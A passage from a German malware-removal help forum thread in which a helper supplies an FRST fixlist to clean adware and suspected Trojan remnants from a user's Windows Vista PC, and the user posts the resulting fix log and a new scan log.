sh=6994FC133F3D99F1B1257370C9BC01BD54AF5D30 ft=1 fh=d1eb868415c0b931 vn="Variante von Win32/Toolbar.Conduit.AI evtl. unerwünschte Anwendung" ac=I fn="C:\Users\finja\Downloads\zaSetup_92_058_000_de.exe"
sh=C9352C798D66F96D4F894C2BC2CDAD192B662D62 ft=1 fh=7209dc7ad243ecb3 vn="Variante von Win32/Toolbar.Conduit.AI evtl. unerwünschte Anwendung" ac=I fn="C:\Users\finja\Downloads\zaSetup_92_105_000_de.exe"
|
|
06.12.2014, 22:24
| #6 |
| | Trojan.FakeMS.ED in dll-Datei Drücke bitte die Windowstaste + R Taste und schreibe notepad in das Ausführen Fenster. Kopiere nun folgenden Text aus der Code-Box in das leere Textdokument Code:
ATTFilter C:\Users\finja\AppData\Local\gnuutilityUI
C:\Users\finja\AppData\Roaming\MQZDOUD
C:\Users\finja\AppData\Roaming\XPGILDE
C:\Users\finja\Downloads\61C.tmp
C:\Users\finja\Downloads\advancedfileoptimizersetup_backup (1).exe
C:\Users\finja\Downloads\advancedfileoptimizersetup_backup.exe
C:\Users\finja\Downloads\advancedfileoptimizersetup_GPX.exe
C:\Users\finja\Downloads\IDM2-Win-EN (1).exe
C:\Users\finja\Downloads\IDM2-Win-EN (2).exe
C:\Users\finja\Downloads\IDM2-Win-EN (3).exe
C:\Users\finja\Downloads\IDM2-Win-EN.exe
C:\Users\finja\Downloads\installer_java_German.exe
C:\Users\finja\Downloads\Luxury.exe
C:\Users\finja\Downloads\rcpsetupmarm1_marm1454010000de_aot_nd2-pop (1).exe
C:\Users\finja\Downloads\rcpsetupmarm1_marm1454010000de_aot_nd2-pop.exe
C:\Users\finja\Downloads\tamnsp_26100739511631607.exe
C:\Users\finja\Downloads\zaSetup_92_058_000_de.exe
C:\Users\finja\Downloads\zaSetup_92_105_000_de.exe
HKU\S-1-5-21-717213786-2690546565-922636609-1000\...\MountPoints2: F - F:\LaunchU3.exe -a
HKU\S-1-5-21-717213786-2690546565-922636609-1000\...\MountPoints2: I - I:\LaunchU3.exe -a
FF Plugin HKU\S-1-5-21-717213786-2690546565-922636609-1000: @lightspark.github.com/Lightspark;version=1 -> C:\Program Files\Lightspark 0.5.3-git\nplightsparkplugin.dll No File
FF Extension: No Name - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\extensions\1c021e811b224beba7ca0a1c@13f4ea57cb304bae95228b2f9e68.com [Not Found]
FF Extension: No Name - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\extensions\3c8f3083-413b-4aa6-ad29-fb93d8982e80@gmail.com [Not Found]
FF Extension: No Name - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\extensions\ae890d63edd74e6c8739fc18@c5d8be9efbac4fe184bfab.com [Not Found]
FF Extension: No Name - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\extensions\tylerkeith11@aol.com [Not Found]
FF Extension: No Name - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\extensions\{9015bae7-cdbb-4473-a5d0-ecfa559b2ca5}.xpi [Not Found]
FF Extension: No Name - C:\Program Files\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd} [Not Found]
FF Extension: No Name - {9015bae7-cdbb-4473-a5d0-ecfa559b2ca5} [Not Found]
FF Extension: No Name - 1c021e811b224beba7ca0a1c@13f4ea57cb304bae95228b2f9e68.com [Not Found]
FF Extension: No Name - 3c8f3083-413b-4aa6-ad29-fb93d8982e80@gmail.com [Not Found]
FF Extension: No Name - tylerkeith11@aol.com [Not Found]
FF Extension: No Name - ae890d63edd74e6c8739fc18@c5d8be9efbac4fe184bfab.com [Not Found]
S3 BS2521310881; \??\C:\Users\finja\AppData\Local\Temp\NTFS.sys [X]
2014-12-05 20:32 - 2014-12-05 20:32 - 00011842 _____ () C:\Windows\system32\.crusader
2014-12-05 20:01 - 2014-12-05 20:32 - 00000000 ____D () C:\Users\finja\AppData\Local\gnuutilityUI
2014-12-05 20:01 - 2014-12-05 20:02 - 00000000 ____D () C:\Windows\system32\guicca32
2014-11-06 20:47 - 2014-11-13 12:44 - 00000000 ____D () C:\ProgramData\boost_interprocess
CustomCLSID: HKU\S-1-5-21-717213786-2690546565-922636609-1000_Classes\CLSID\{5D39BBA0-67EE-42FE-8640-57C456AE4C8A}\InprocServer32 -> C:\Users\finja\AppData\LocalLow\WiseConvert_1.3_B2\prxtbWis0.dll No File
CustomCLSID: HKU\S-1-5-21-717213786-2690546565-922636609-1000_Classes\CLSID\{66E8DCC7-97D2-4A89-8E08-D0610FF0878C}\InprocServer32 -> C:\Users\finja\AppData\Local\Conduit\Community Alerts\Alert.dll No File
CustomCLSID: HKU\S-1-5-21-717213786-2690546565-922636609-1000_Classes\CLSID\{F9E1BD9A-84B5-4D12-9195-0B3E7D86FD35}\InprocServer32 -> C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll No File
Speichere diese bitte als Fixlist.txt auf deinem Desktop (oder dem Verzeichnis in dem sich FRST befindet).
Dann, Bitte starte FRST erneut, setze den Haken auch bei Addition.txt und drücke auf Scan.
__________________ --> Trojan.FakeMS.ED in dll-Datei |
|
06.12.2014, 22:39
| #7 |
| | Trojan.FakeMS.ED in dll-DateiCode:
ATTFilter Fix result of Farbar Recovery Tool (FRST written by Farbar) (x86) Version: 06-12-2014 02
Ran by finja at 2014-12-06 22:35:43 Run:2
Running from C:\Users\finja\Desktop
Loaded Profile: finja (Available profiles: finja)
Boot Mode: Normal
==============================================
Content of fixlist:
*****************
C:\Users\finja\AppData\Local\gnuutilityUI
C:\Users\finja\AppData\Roaming\MQZDOUD
C:\Users\finja\AppData\Roaming\XPGILDE
C:\Users\finja\Downloads\61C.tmp
C:\Users\finja\Downloads\advancedfileoptimizersetup_backup (1).exe
C:\Users\finja\Downloads\advancedfileoptimizersetup_backup.exe
C:\Users\finja\Downloads\advancedfileoptimizersetup_GPX.exe
C:\Users\finja\Downloads\IDM2-Win-EN (1).exe
C:\Users\finja\Downloads\IDM2-Win-EN (2).exe
C:\Users\finja\Downloads\IDM2-Win-EN (3).exe
C:\Users\finja\Downloads\IDM2-Win-EN.exe
C:\Users\finja\Downloads\installer_java_German.exe
C:\Users\finja\Downloads\Luxury.exe
C:\Users\finja\Downloads\rcpsetupmarm1_marm1454010000de_aot_nd2-pop (1).exe
C:\Users\finja\Downloads\rcpsetupmarm1_marm1454010000de_aot_nd2-pop.exe
C:\Users\finja\Downloads\tamnsp_26100739511631607.exe
C:\Users\finja\Downloads\zaSetup_92_058_000_de.exe
C:\Users\finja\Downloads\zaSetup_92_105_000_de.exe
HKU\S-1-5-21-717213786-2690546565-922636609-1000\...\MountPoints2: F - F:\LaunchU3.exe -a
HKU\S-1-5-21-717213786-2690546565-922636609-1000\...\MountPoints2: I - I:\LaunchU3.exe -a
FF Plugin HKU\S-1-5-21-717213786-2690546565-922636609-1000: @lightspark.github.com/Lightspark;version=1 -> C:\Program Files\Lightspark 0.5.3-git\nplightsparkplugin.dll No File
FF Extension: No Name - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\extensions\1c021e811b224beba7ca0a1c@13f4ea57cb304bae95228b2f9e68.com [Not Found]
FF Extension: No Name - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\extensions\3c8f3083-413b-4aa6-ad29-fb93d8982e80@gmail.com [Not Found]
FF Extension: No Name - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\extensions\ae890d63edd74e6c8739fc18@c5d8be9efbac4fe184bfab.com [Not Found]
FF Extension: No Name - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\extensions\tylerkeith11@aol.com [Not Found]
FF Extension: No Name - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\extensions\{9015bae7-cdbb-4473-a5d0-ecfa559b2ca5}.xpi [Not Found]
FF Extension: No Name - C:\Program Files\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd} [Not Found]
FF Extension: No Name - {9015bae7-cdbb-4473-a5d0-ecfa559b2ca5} [Not Found]
FF Extension: No Name - 1c021e811b224beba7ca0a1c@13f4ea57cb304bae95228b2f9e68.com [Not Found]
FF Extension: No Name - 3c8f3083-413b-4aa6-ad29-fb93d8982e80@gmail.com [Not Found]
FF Extension: No Name - tylerkeith11@aol.com [Not Found]
FF Extension: No Name - ae890d63edd74e6c8739fc18@c5d8be9efbac4fe184bfab.com [Not Found]
S3 BS2521310881; \??\C:\Users\finja\AppData\Local\Temp\NTFS.sys [X]
2014-12-05 20:32 - 2014-12-05 20:32 - 00011842 _____ () C:\Windows\system32\.crusader
2014-12-05 20:01 - 2014-12-05 20:32 - 00000000 ____D () C:\Users\finja\AppData\Local\gnuutilityUI
2014-12-05 20:01 - 2014-12-05 20:02 - 00000000 ____D () C:\Windows\system32\guicca32
2014-11-06 20:47 - 2014-11-13 12:44 - 00000000 ____D () C:\ProgramData\boost_interprocess
CustomCLSID: HKU\S-1-5-21-717213786-2690546565-922636609-1000_Classes\CLSID\{5D39BBA0-67EE-42FE-8640-57C456AE4C8A}\InprocServer32 -> C:\Users\finja\AppData\LocalLow\WiseConvert_1.3_B2\prxtbWis0.dll No File
CustomCLSID: HKU\S-1-5-21-717213786-2690546565-922636609-1000_Classes\CLSID\{66E8DCC7-97D2-4A89-8E08-D0610FF0878C}\InprocServer32 -> C:\Users\finja\AppData\Local\Conduit\Community Alerts\Alert.dll No File
CustomCLSID: HKU\S-1-5-21-717213786-2690546565-922636609-1000_Classes\CLSID\{F9E1BD9A-84B5-4D12-9195-0B3E7D86FD35}\InprocServer32 -> C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll No File
*****************
C:\Users\finja\AppData\Local\gnuutilityUI => Moved successfully.
C:\Users\finja\AppData\Roaming\MQZDOUD => Moved successfully.
C:\Users\finja\AppData\Roaming\XPGILDE => Moved successfully.
C:\Users\finja\Downloads\61C.tmp => Moved successfully.
C:\Users\finja\Downloads\advancedfileoptimizersetup_backup (1).exe => Moved successfully.
C:\Users\finja\Downloads\advancedfileoptimizersetup_backup.exe => Moved successfully.
C:\Users\finja\Downloads\advancedfileoptimizersetup_GPX.exe => Moved successfully.
C:\Users\finja\Downloads\IDM2-Win-EN (1).exe => Moved successfully.
C:\Users\finja\Downloads\IDM2-Win-EN (2).exe => Moved successfully.
C:\Users\finja\Downloads\IDM2-Win-EN (3).exe => Moved successfully.
C:\Users\finja\Downloads\IDM2-Win-EN.exe => Moved successfully.
C:\Users\finja\Downloads\installer_java_German.exe => Moved successfully.
C:\Users\finja\Downloads\Luxury.exe => Moved successfully.
C:\Users\finja\Downloads\rcpsetupmarm1_marm1454010000de_aot_nd2-pop (1).exe => Moved successfully.
C:\Users\finja\Downloads\rcpsetupmarm1_marm1454010000de_aot_nd2-pop.exe => Moved successfully.
C:\Users\finja\Downloads\tamnsp_26100739511631607.exe => Moved successfully.
C:\Users\finja\Downloads\zaSetup_92_058_000_de.exe => Moved successfully.
C:\Users\finja\Downloads\zaSetup_92_105_000_de.exe => Moved successfully.
"HKU\S-1-5-21-717213786-2690546565-922636609-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\S-1-5-21-717213786-2690546565-922636609-1000" => Key not found.
"HKU\S-1-5-21-717213786-2690546565-922636609-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\S-1-5-21-717213786-2690546565-922636609-1000" => Key not found.
"HKU\S-1-5-21-717213786-2690546565-922636609-1000\Software\MozillaPlugins\@lightspark.github.com/Lightspark;version=1" => Key deleted successfully.
C:\Program Files\Lightspark 0.5.3-git\nplightsparkplugin.dll not found.
C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\extensions\1c021e811b224beba7ca0a1c@13f4ea57cb304bae95228b2f9e68.com => not found.
C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\extensions\3c8f3083-413b-4aa6-ad29-fb93d8982e80@gmail.com => not found.
C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\extensions\ae890d63edd74e6c8739fc18@c5d8be9efbac4fe184bfab.com => not found.
C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\extensions\tylerkeith11@aol.com => not found.
C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\extensions\{9015bae7-cdbb-4473-a5d0-ecfa559b2ca5}.xpi => not found.
C:\Program Files\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd} => not found.
FF Extension: No Name - {9015bae7-cdbb-4473-a5d0-ecfa559b2ca5} [Not Found] => not found.
FF Extension: No Name - 1c021e811b224beba7ca0a1c@13f4ea57cb304bae95228b2f9e68.com [Not Found] => not found.
FF Extension: No Name - 3c8f3083-413b-4aa6-ad29-fb93d8982e80@gmail.com [Not Found] => not found.
FF Extension: No Name - tylerkeith11@aol.com [Not Found] => not found.
FF Extension: No Name - ae890d63edd74e6c8739fc18@c5d8be9efbac4fe184bfab.com [Not Found] => not found.
BS2521310881 => Service deleted successfully.
C:\Windows\system32\.crusader => Moved successfully.
"C:\Users\finja\AppData\Local\gnuutilityUI" => File/Directory not found.
C:\Windows\system32\guicca32 => Moved successfully.
C:\ProgramData\boost_interprocess => Moved successfully.
"HKU\S-1-5-21-717213786-2690546565-922636609-1000_Classes\CLSID\{5D39BBA0-67EE-42FE-8640-57C456AE4C8A}" => Key deleted successfully.
"HKU\S-1-5-21-717213786-2690546565-922636609-1000_Classes\CLSID\{66E8DCC7-97D2-4A89-8E08-D0610FF0878C}" => Key deleted successfully.
"HKU\S-1-5-21-717213786-2690546565-922636609-1000_Classes\CLSID\{F9E1BD9A-84B5-4D12-9195-0B3E7D86FD35}" => Key deleted successfully.
==== End of Fixlog ====
FRST Logfile: FRST Logfile: Code:
ATTFilter Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 06-12-2014 02 Ran by finja (administrator) on FINJA-PC on 06-12-2014 22:36:43 Running from C:\Users\finja\Desktop Loaded Profile: finja (Available profiles: finja) Platform: Microsoft® Windows Vista™ Home Premium Service Pack 2 (X86) OS Language: Deutsch (Deutschland) Internet Explorer Version 9 Boot Mode: Normal Tutorial for Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Processes (Whitelisted) ================= (If an entry is included in the fixlist, the process will be closed. The file will not be moved.) (Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe (Microsoft Corporation) C:\Windows\System32\SLsvc.exe (Microsoft Corporation) C:\Windows\System32\wlanext.exe () C:\Program Files\EMACHINES\eMachines Recovery Management\Service\ETService.exe (Dritek System Inc.) C:\Program Files\Launch Manager\LManager.exe (Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Apoint.exe (Intel Corporation) C:\Windows\System32\igfxsrvc.exe (Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApMsgFwd.exe (Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApntEx.exe (Intel Corporation) C:\Windows\System32\igfxext.exe (Microsoft Corporation) C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe (Intel Corporation) C:\Windows\System32\igfxtray.exe (Intel Corporation) C:\Windows\System32\hkcmd.exe (Intel Corporation) C:\Windows\System32\igfxpers.exe (InterVideo) C:\Program Files\Common Files\InterVideo\RegMgr\iviRegMgr.exe (Hewlett-Packard Company) C:\Program Files\Common Files\LightScribe\LSSrvc.exe (Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe (Malwarebytes Corporation) C:\Program Files\ Malwarebytes Anti-Malware \mbamscheduler.exe (Microsoft Corporation) C:\Windows\ehome\ehtray.exe (Malwarebytes Corporation) C:\Program Files\ Malwarebytes Anti-Malware \mbamservice.exe (Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVC.EXE (Malwarebytes Corporation) C:\Program Files\ Malwarebytes Anti-Malware \mbam.exe (Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe (Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVCM.EXE (1und1 Mail und Media GmbH) C:\Program Files\WEB.DE MailCheck\IE\WEB.DE_MailCheck_Broker.exe (Microsoft Corporation) C:\Windows\ehome\ehmsas.exe (Microsoft Corporation) C:\Windows\System32\wbem\unsecapp.exe (Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe ==================== Registry (Whitelisted) ================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM\...\Run: [Windows Defender] => C:\Program Files\Windows Defender\MSASCui.exe [1008184 2008-01-21] (Microsoft Corporation) HKLM\...\Run: [LManager] => C:\Program Files\Launch Manager\LManager.exe [768520 2008-07-25] (Dritek System Inc.) HKLM\...\Run: [Apoint] => C:\Program Files\Apoint2K\Apoint.exe [159744 2007-07-21] (Alps Electric Co., Ltd.) HKLM\...\Run: [WarReg_PopUp] => C:\Program Files\eMachines\WR_PopUp\WarReg_PopUp.exe [49152 2008-05-09] (eMachines) HKLM\...\Run: [GrooveMonitor] => C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe [30040 2009-02-26] (Microsoft Corporation) HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959176 2014-08-21] (Adobe Systems Incorporated) HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [974432 2014-08-22] (Microsoft Corporation) HKLM\...\Run: [MailCheck IE Broker] => C:\Program Files\WEB.DE MailCheck\IE\WEB.DE_MailCheck_Broker.exe [2135104 2014-11-17] (1und1 Mail und Media GmbH) HKU\S-1-5-19\...\Run: [WindowsWelcomeCenter] => rundll32.exe oobefldr.dll,ShowWelcomeCenter HKU\S-1-5-20\...\Run: [WindowsWelcomeCenter] => rundll32.exe oobefldr.dll,ShowWelcomeCenter HKU\S-1-5-21-717213786-2690546565-922636609-1000\...\Run: [ehTray.exe] => C:\Windows\ehome\ehTray.exe [125952 2008-01-21] (Microsoft Corporation) HKU\S-1-5-21-717213786-2690546565-922636609-1000\...\MountPoints2: F - F:\LaunchU3.exe -a HKU\S-1-5-21-717213786-2690546565-922636609-1000\...\MountPoints2: I - I:\LaunchU3.exe -a ==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://suche.web.de/webhp?src=br_startpage_ie StartMenuInternet: IEXPLORE.EXE - iexplore.exe SearchScopes: HKLM -> {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACEW SearchScopes: HKU\.DEFAULT -> {31BB071C-45F4-4DAD-BF5E-AD495B3B2FC8} URL = hxxp://suche.web.de/search/web/?su={searchTerms}&origin=searchplugin SearchScopes: HKU\S-1-5-21-717213786-2690546565-922636609-1000 -> DefaultScope {0DE76405-1CA2-4197-98FF-E6340A0B93E8} URL = hxxp://suche.web.de/search/web/?su={searchTerms}&origin=searchplugin SearchScopes: HKU\S-1-5-21-717213786-2690546565-922636609-1000 -> {0DE76405-1CA2-4197-98FF-E6340A0B93E8} URL = hxxp://suche.web.de/search/web/?su={searchTerms}&origin=searchplugin BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office12\GrooveShellExtensions.dll (Microsoft Corporation) BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.) BHO: Windows Live Messenger Companion Helper -> {9FDDE16B-836F-4806-AB1F-1455CBEFF289} -> C:\Program Files\Windows Live\Companion\companioncore.dll (Microsoft Corporation) BHO: WEB.DE MailCheck BHO -> {BF42D4A8-016E-4fcd-B1EB-837659FD77C6} -> C:\Program Files\WEB.DE MailCheck\IE\WEB.DE_MailCheck.dll (1und1 Mail und Media GmbH) DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files\Microsoft Office\Office12\GrooveSystemServices.dll (Microsoft Corporation) Handler: ms-itss - {0A9007C0-4076-11D3-8789-0000F8105754} - c:\Program Files\Common Files\Microsoft Shared\Information Retrieval\msitss.dll (Microsoft Corporation) Handler: webde - {8FAF0273-9CA8-4efc-9536-1E35E254D5CD} - C:\Program Files\WEB.DE MailCheck\IE\WEB.DE_MailCheck.dll (1und1 Mail und Media GmbH) Tcpip\Parameters: [DhcpNameServer] 192.168.179.1 FireFox: ======== FF ProfilePath: C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32_15_0_0_189.dll () FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation) FF Plugin: @microsoft.com/OfficeLive,version=1.5 -> C:\Program Files\Microsoft\Office Live\npOLW.dll (Microsoft Corp.) FF Plugin: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation) FF Plugin: @microsoft.com/WLPG,version=15.4.3555.0308 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation) FF Plugin: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation) FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.) FF SearchPlugin: C:\Program Files\mozilla firefox\searchplugins\webssearches.xml FF Extension: 06997db0c0274d5fbd37b0d9230226ea - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\Extensions\{06997db0-c027-4d5f-bd37-b0d9230226ea} [2014-11-06] FF Extension: Microsoft .NET Framework Assistant - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\Extensions\{20a82645-c095-46ed-80e3-08825760534b}.xpi [2014-11-04] FF Extension: PriceFountain - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\Extensions\{b6a94784-0ffb-4121-88c6-435139067ee2}.xpi [2014-11-06] FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension FF Extension: Microsoft .NET Framework Assistant - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2009-08-16] FF Extension: No Name - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\extensions\1c021e811b224beba7ca0a1c@13f4ea57cb304bae95228b2f9e68.com [Not Found] FF Extension: No Name - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\extensions\3c8f3083-413b-4aa6-ad29-fb93d8982e80@gmail.com [Not Found] FF Extension: No Name - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\extensions\ae890d63edd74e6c8739fc18@c5d8be9efbac4fe184bfab.com [Not Found] FF Extension: No Name - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\extensions\tylerkeith11@aol.com [Not Found] FF Extension: No Name - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\extensions\{9015bae7-cdbb-4473-a5d0-ecfa559b2ca5}.xpi [Not Found] FF Extension: No Name - C:\Program Files\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd} [Not Found] FF Extension: No Name - {9015bae7-cdbb-4473-a5d0-ecfa559b2ca5} [Not Found] FF Extension: No Name - 1c021e811b224beba7ca0a1c@13f4ea57cb304bae95228b2f9e68.com [Not Found] FF Extension: No Name - 3c8f3083-413b-4aa6-ad29-fb93d8982e80@gmail.com [Not Found] FF Extension: No Name - tylerkeith11@aol.com [Not Found] FF Extension: No Name - ae890d63edd74e6c8739fc18@c5d8be9efbac4fe184bfab.com [Not Found] FF StartMenuInternet: FIREFOX.EXE - firefox.exe Chrome: ======= CHR StartMenuInternet: Google Chrome - chrome.exe ========================== Services (Whitelisted) ================= (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) R2 ETService; C:\Program Files\EMACHINES\eMachines Recovery Management\Service\ETService.exe [24576 2008-06-11] () [File not signed] R2 LightScribeService; C:\Program Files\Common Files\LightScribe\LSSrvc.exe [61440 2007-01-17] (Hewlett-Packard Company) [File not signed] R2 MBAMScheduler; C:\Program Files\ Malwarebytes Anti-Malware \mbamscheduler.exe [1871160 2014-11-21] (Malwarebytes Corporation) R2 MBAMService; C:\Program Files\ Malwarebytes Anti-Malware \mbamservice.exe [969016 2014-11-21] (Malwarebytes Corporation) R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [22192 2014-08-22] (Microsoft Corporation) S2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [44032 2009-05-14] (Hewlett-Packard) [File not signed] R3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [288120 2014-08-22] (Microsoft Corporation) S2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [53760 2009-05-14] (Hewlett-Packard) [File not signed] ==================== Drivers (Whitelisted) ==================== (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) R1 DritekPortIO; C:\Program Files\Launch Manager\DPortIO.sys [20112 2006-11-02] (Dritek System Inc.) S3 grmnusb; C:\Windows\System32\drivers\grmnusb.sys [15720 2012-04-18] (GARMIN Corp.) S3 hitmanpro37; C:\Windows\system32\drivers\hitmanpro37.sys [35992 2014-12-05] () R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [23256 2014-11-21] (Malwarebytes Corporation) R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [114904 2014-12-06] (Malwarebytes Corporation) R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [51928 2014-11-21] (Malwarebytes Corporation) R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [231800 2014-07-17] (Microsoft Corporation) S3 USB_RNDIS; C:\Windows\System32\DRIVERS\usb8023.sys [15872 2013-02-12] (Microsoft Corporation) S3 IntcAzAudAddService; system32\drivers\RTKVHDA.sys [X] S3 IpInIp; system32\DRIVERS\ipinip.sys [X] S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X] S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X] ==================== NetSvcs (Whitelisted) =================== (If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.) ==================== One Month Created Files and Folders ======== (If an entry is included in the fixlist, the file\folder will be moved.) 2014-12-06 20:51 - 2014-12-06 20:51 - 00000000 ____D () C:\ProgramData\UUdb 2014-12-06 20:39 - 2014-12-06 20:39 - 00015786 _____ () C:\Users\finja\Desktop\eset.txt 2014-12-06 16:21 - 2014-12-06 16:21 - 00000634 _____ () C:\Users\finja\Desktop\JRT.txt 2014-12-06 15:41 - 2014-12-06 15:41 - 00001257 _____ () C:\Users\finja\Desktop\AdwCleaner[S3].txt 2014-12-06 15:36 - 2014-12-06 15:36 - 01707646 _____ (Thisisu) C:\Users\finja\Desktop\JRT.exe 2014-12-06 15:35 - 2014-12-06 15:35 - 02153472 _____ () C:\Users\finja\Desktop\AdwCleaner_4.104.exe 2014-12-06 10:28 - 2014-12-06 16:14 - 00001435 _____ () C:\Users\finja\Desktop\mbam.txt 2014-12-06 10:23 - 2014-12-06 10:24 - 00018716 _____ () C:\Users\finja\Desktop\gmer.txt 2014-12-06 09:22 - 2014-12-06 17:46 - 00020229 _____ () C:\Users\finja\Desktop\Addition.txt 2014-12-06 09:22 - 2014-12-06 09:22 - 00380416 _____ () C:\Users\finja\Desktop\v5shw8ku.exe 2014-12-06 09:20 - 2014-12-06 22:37 - 00012859 _____ () C:\Users\finja\Desktop\FRST.txt 2014-12-06 09:20 - 2014-12-06 22:36 - 00000000 ____D () C:\FRST 2014-12-06 09:19 - 2014-12-06 17:35 - 01111040 _____ (Farbar) C:\Users\finja\Desktop\FRST.exe 2014-12-06 09:18 - 2014-12-06 09:18 - 00000472 _____ () C:\Users\finja\Desktop\defogger_disable.log 2014-12-06 09:18 - 2014-12-06 09:18 - 00000000 _____ () C:\Users\finja\defogger_reenable 2014-12-06 09:17 - 2014-12-06 09:17 - 00050477 _____ () C:\Users\finja\Desktop\Defogger.exe 2014-12-06 08:40 - 2014-12-06 08:50 - 00003570 _____ () C:\Users\finja\Desktop\Rkill.txt 2014-12-06 08:39 - 2014-12-06 08:39 - 01944824 _____ (Bleeping Computer, LLC) C:\Users\finja\Downloads\rkill.exe 2014-12-05 